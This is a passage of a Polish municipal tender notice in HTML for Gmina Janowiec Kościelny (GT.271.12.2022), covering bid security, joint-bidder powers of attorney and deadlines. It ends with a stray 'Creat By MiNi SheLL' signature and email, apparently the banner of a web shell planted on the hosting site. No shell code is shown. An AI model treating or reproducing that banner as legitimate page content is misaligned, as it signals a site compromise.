zamawiający przechowuje na rachunku bankowym. Jeśli wadium jest wnoszone w formie gwarancji lub poręczenia, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej <br/>f)	Wykaz rozwiązań równoważnych – wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone przez zamawiającego. W takim przypadku wykonawca załącza do oferty wykaz rozwiązań równoważnych z jego opisem lub normami.<br/>g)	Zastrzeżenie tajemnicy przedsiębiorstwa.<br/>h)	Informacje dotyczące wykonawcy (załącznik nr 3 do SWZ) – w tym dokumencie wykonawca składa informację, czy wybór oferty wykonawcy będzie prowadził do powstania u zamawiającego obowiązku podatkowego <br/>i)	Wykaz osób składany w celu oceny oferty z zastosowaniem kryterium – doświadczenie osób wyznaczonych do realizacji zamówienia <br/>Zamawiający nie wymaga na etapie złożenia oferty</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie ze Specyfikacją Warunków Zamówienia GT.271.12.2022 <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający przewiduje wniesienie wadium przetargowego przed upływem terminu składania ofert w wysokości: <br/>1)	5000,00 zł (słownie: pięć tysięcy złotych 00/100)<br/>2)	Wadium winno być wniesione w jednej lub kilku formach określonych w art. 97 ust. 7 Ustawy tj. może być wnoszone w:<br/>-	pieniądzu,<br/>-	gwarancjach bankowych,<br/>-	gwarancjach ubezpieczeniowych,<br/>-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2020 roku, poz. 299, ze am.).<br/><br/>Wadium wnoszone w pieniądzu wpłaca się przelewem na konto Zamawiającego tj.<br/>Gmina Janowiec Kościelny Bank Spółdzielczy w Nidzicy o/Janowiec Kościelny nr rachunku:<br/>20 8834 1035 2004 0200 1155 0005<br/>oznaczenie sprawy GT.271.12.2022 <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> •	W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty. <br/>Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności wskazanie:<br/>-	postępowania o zamówienie publiczne, którego dotyczy,<br/>-	wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>-	ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>Wymagana forma:<br/>Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym. <br/>Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-26 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem miniportalu https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-26 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Szczegółowe informacje dot. zamówienia znajdują się w Specyfikacji Warunków Zamówienia GT.271.12.2022

Creat By MiNi SheLL
Email: jattceo@gmail.com